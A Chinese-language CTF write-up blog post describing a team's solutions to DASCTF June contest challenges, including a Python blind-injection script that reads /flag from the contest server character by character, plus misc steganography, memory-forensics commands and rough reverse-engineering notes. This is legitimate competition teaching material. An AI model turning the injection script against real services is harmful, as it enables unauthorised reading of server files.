安恒六月赛&DASCTF 弱鸡划水记

先上截图:

咳咳,队名怪怪的,这次我跟mz师傅和宇师傅一起组队来着,基本上全程mz师傅带飞,我思路提供+misc输出,宇师傅跟我一起划水.jpg

直接上内容吧。

web1&web2

本质上这俩题目没啥区别。day1上午过滤不全可以直接进行命令执行来着

然后就修复了,随后转换思路变成布尔注入

mz师傅梭了脚本直接就出了

贴一下脚本

import time
import requests
import re

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
    'Referer': 'http://183.129.189.60:10026/',
    'Content-Type': 'application/x-www-form-urlencoded'
}
proxy = {
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080',
}
url = 'http://183.129.189.60:10026'
payload='input='
flag = 'DASCTF{53a6ee'
py = payload + ''
s = requests.Session()
s.headers = header
sum = 0
index = 13
r = s.get(url, proxies=proxy)
x = re.findall("<h4>(.*?)</h4>",r.text)
x = x[0]
x = x[:-1]
sum = eval(x)
# sum 计算
while True:
    end = False
    for i in range(33, 127):
        time.sleep(0.2)
        py = payload + str(sum) + " and open('/flag','r').readline()[" + str(index) + "]=='"+chr(i)+"'"
        print(py)
        r = s.post(url, data=py, proxies=proxy)
        if r.status_code == 200:
            x = re.findall("<h4>(.*?)</h4>", r.text)
            x = x[0]
            x = x[:-1]
            sum = eval(x)
            if "Congratulations" in r.text:
                flag += chr(i)
                index += 1
                print(flag)
                if chr(i) == '}':
                    end = True
                break
        else:
            print('error')
            break
    if end:
        break

计算器2跟1没多大区别。。。反正一个脚本两个通吃,也没啥意思了。

考点就是布尔盲注11111

phpuns

这题我们拿的首杀(虽然mz师傅直接梭出来了233333

那也简单写一下,这题mz说直接用给的session

然后呃直接梭出来了。。。

预期解请查看y1ng神仙的wp:https://www.gem-love.com/ctf/2401.html

misc1:

这题属实啥b,看了眼wp才知道原来这么nt。

开局给了明文:

PiTXPBoBd3OVOMdheMGSOZXXeJXXOJ1ge64WPMGBc3cCPJKDc7W=

看了眼wp才知道就是个提取盲水印

一点提示也不给属实nb,爪巴

base64换表,支出:

    from string import maketrans
    a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    b = '0123456789abcdefGHIJKLMNOPQrstuvwXYZghijklmnopqRSTUVW*ABCDEF@xyz'
    c = 'PiTXPBoBd3OVOMdheMGSOZXXeJXXOJ1ge64WPMGBc3cCPJKDc7W='
    print (c.translate(maketrans(b,a))).decode('base64')

misc2:PhysicalHacker

这题就差最后一步,摆在了不知道snow隐写,学到了。

开局给的一个加密数据包,给了一个脚本,看来明显是解密了。

配合脚本生成密码本,工具梭出密码。

解密即可

常规wireshark分析,提取出一个txt。。

就这个属实搞我心态,最后也就卡这了,学到了是snow隐写,那就简单了,

直接出了。

misc:keyboard

这题是四月赛同意样的题目,直接出了我就直接白嫖分数,由于上次的wp数据丢失,我就补一下。

直接

volatility -f Keyboard.raw –profile=Win7SP1x64 filescan | grep keyboard

找到:

嗯,然后filedump出来

volatility -f Keyboard.raw –profile=Win7SP1x64 dumpfiles -Q 0x000000003d700880 -D ./ -u

记事本打开,qwe加密算法就不多说了

直接用来解密serect文件,

发现没文件,直接nfs数据流查看,就出了

misc:透明度

明明比头两个简单却分数搞得一批(怪

开局一个图

题目名称RGBA,下意识就丢在Steg里面了。。。

然后直接就出了个压缩包。。

提取出来后

看来是个爆破后两位,爆破出来密码是nepnb

然后就出了。

RE

以下内容均为MZ师傅本人亲笔,或许只有他自己看的懂罢,我先吹为敬

RE1

档sQfrost熟练的打开了IDA,Remote Windows debugger
0088A5F2
call 008817C6 jmp 00886700

//
Qfrost熟练的打开了IDA,Remote Windows debugger
00889AD5

数据存入
008E7820

ebp-14h的位置存 输入数据
//
新的函数 ecx存储input –>ebp-8h
ebp-14h –>haha1234567890

//ebp-8h –>input

//
strcpy—>009FFB78 小端!

、、在eip=00887AE3上面有一段对input的处理–》处理完存在008D7820的位置

00897000 F2 A8 84 EB 98 9F 26 FB 83 94 22 DC 颞勲槦&麅??
00897010 49 03 2A EA 5E 15 E6 60 56 9E DF D9 I*阇鎌V炦?…

00897000 C6 A5 04 53 33 C3 C8 9E 2F 8F 44 E0 匹S3萌?廌?
00897010 9D 24 2F 28 E4 DC DB 34 78 B8 4C 38 ?/(滠?x窵8….

、、!!!真正的比较函数再0088531E

flag=
123456789012345678901234
008D7820 B9 F2 47 1C 44 B5 9B F9 61 F0 18 B3 C0 4F 2B 70 跪GD禌鵤?忱O+p
008D7830 8C AA 87 74 39 EF 11 71 尓噒9?q…

与一部分的字符异或就能得到flag

include
include
void main(){
unsigned char c[] = {
0x88,0xc0,0x74,0x28,
0x71,0x83,0xAC,0xc1,
0x58,0xc0,0x29,0x81,
0xF3,0x7B,0x1E,0x46,
0xbb,0x92,0xBE,0x44,
0x08,0xdd,0x22,0x45
};
unsigned char result[] = {
0xC6,0xa5,0x04,0x53,
0x33,0xc3,0xc8,0x9e,
0x2f,0x8f,0x44,0xe0,
0x9d,0x24,0x2f,0x28,
0xe4,0xdc,0xdb,0x34,
0x78,0xb8,0x4c,0x38
};
unsigned char input[25]={0};
int i;
for (i = 0 ; i< 24; i ++){
input[i] = c[i] ^ result[i];
}
printf("%s", input);
return;
}

RE2:


^
select
WHERE

flag=
c92bb6a5+a6c30091+24566d882d4bc7ee
c92bb6a5a6c3009124566d882d4bc7ee

读tt.txt到v8
做aes
2490AAB87A7CB1487B13F0F7A3B316FA
密钥:f7c6b5a4 1107cfaf
4a5b6c7ffafc7011

==>a6c30091ffffffff ==>v22

v3=30306C3E3E3D3C3A 00l>>=<: v4=mm?kj>l00
v4= :l<jk?mm

RE6:

嗯,没有思路分析,看出来tql55555

RE4:

有点可惜,出来个大概结果全都不正确,先贴在这。

strlen(input) == 32
Nep{*}

从最后一位遍历
1.对称的两位 异或 以后有要求
0123456789
Nep{mrcladmaoisnotfree}
Y o
i

y O
U o
e _
u O
^ o
n _
~ O
O x
_ h
o X
2.对称的两位 与 以后有要求
猜测
Nep{mircle_and_maho_is_not_free}
//

Nep{mYrclU_a^dOmaxooisonotofree}/
Nep{mYrclU_a^dOmaxooisonotofree}/
Nep{mYrclU_a^domaXooisonotofree}/
Nep{mYrclU_andOmaxo_isonotofree}/
Nep{mYrclU_andOmaxo_isonotofree}/
Nep{mYrclU_andomaXo_isonotofree}/
Nep{mYrclU_a~dOmaxoOisonotofree}/
Nep{mYrclU_a~d_mahoOisonotofree}=
Nep{mYrclU_a~domaXoOisonotofree}/
Nep{mYrcle_a^dOmaxoois_notofree}/
Nep{mYrcle_a^d_mahoois_notofree}=
Nep{mYrcle_a^domaXoois_notofree}/
Nep{mYrcle_andOmaxo_is_notofree}/
Nep{mYrcle_and_maho_is_notofree}=
Nep{mYrcle_andomaXo_is_notofree}/
Nep{mYrcle_a~dOmaxoOis_notofree}/
Nep{mYrcle_a~d_mahoOis_notofree}=
Nep{mYrcle_a~domaXoOis_notofree}/
Nep{mYrclu_a^dOmaxooisOnotofree}/
Nep{mYrclu_a^d_mahooisOnotofree}=
Nep{mYrclu_a^domaXooisOnotofree}/
Nep{mYrclu_andOmaxo_isOnotofree}/
Nep{mYrclu_and_maho_isOnotofree}=
Nep{mYrclu_andomaXo_isOnotofree}/
Nep{mYrclu_a~dOmaxoOisOnotofree}/
Nep{mYrclu_a~d_mahoOisOnotofree}=
Nep{mYrclu_a~domaXoOisOnotofree}/
Nep{mirclU_a^dOmaxooisonot_free}/
Nep{mirclU_a^d_mahooisonot_free}=
Nep{mirclU_a^domaXooisonot_free}/
Nep{mirclU_andOmaxo_isonot_free}/
Nep{mirclU_and_maho_isonot_free}=
Nep{mirclU_andomaXo_isonot_free}/
Nep{mirclU_a~dOmaxoOisonot_free}/
Nep{mirclU_a~d_mahoOisonot_free}=
Nep{mirclU_a~domaXoOisonot_free}/
Nep{mircle_a^dOmaxoois_not_free}/
Nep{mircle_a^d_mahoois_not_free}=
Nep{mircle_a^domaXoois_not_free}/
Nep{mircle_andOmaxo_is_not_free}/
Nep{mircle_and_maho_is_not_free}=
Nep{mircle_andomaXo_is_not_free}/
Nep{mircle_a~dOmaxoOis_not_free}/
Nep{mircle_a~d_mahoOis_not_free}=
Nep{mircle_a~domaXoOis_not_free}/
Nep{mirclu_a^dOmaxooisOnot_free}/
Nep{mirclu_a^d_mahooisOnot_free}=
Nep{mirclu_a^domaXooisOnot_free}/
Nep{mirclu_andOmaxo_isOnot_free}/
Nep{mirclu_and_maho_isOnot_free}=
Nep{mirclu_andomaXo_isOnot_free}/
Nep{mirclu_a~dOmaxoOisOnot_free}/
Nep{mirclu_a~d_mahoOisOnot_free}=
Nep{mirclu_a~domaXoOisOnot_free}/
Nep{myrclU_a^dOmaxooisonotOfree}/
Nep{myrclU_a^d_mahooisonotOfree}=
Nep{myrclU_a^domaXooisonotOfree}/
Nep{myrclU_andOmaxo_isonotOfree}/
Nep{myrclU_and_maho_isonotOfree}=
Nep{myrclU_andomaXo_isonotOfree}/
Nep{myrclU_a~dOmaxoOisonotOfree}/
Nep{myrclU_a~d_mahoOisonotOfree}=
Nep{myrclU_a~domaXoOisonotOfree}/
Nep{myrcle_a^dOmaxoois_notOfree}/
Nep{myrcle_a^d_mahoois_notOfree}=
Nep{myrcle_a^domaXoois_notOfree}/
Nep{myrcle_andOmaxo_is_notOfree}/
Nep{myrcle_and_maho_is_notOfree}=
Nep{myrcle_andomaXo_is_notOfree}/
Nep{myrcle_a~dOmaxoOis_notOfree}/
Nep{myrcle_a~d_mahoOis_notOfree}=
Nep{myrcle_a~domaXoOis_notOfree}/
Nep{myrclu_a^dOmaxooisOnotOfree}/
Nep{myrclu_a^d_mahooisOnotOfree}=
Nep{myrclu_a^domaXooisOnotOfree}/
Nep{myrclu_andOmaxo_isOnotOfree}/
Nep{myrclu_and_maho_isOnotOfree}=
Nep{myrclu_andomaXo_isOnotOfree}/
Nep{myrclu_a~dOmaxoOisOnotOfree}/
Nep{myrclu_a~d_mahoOisOnotOfree}=
Nep{myrclu_a~domaXoOisOnotOfree}/
© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发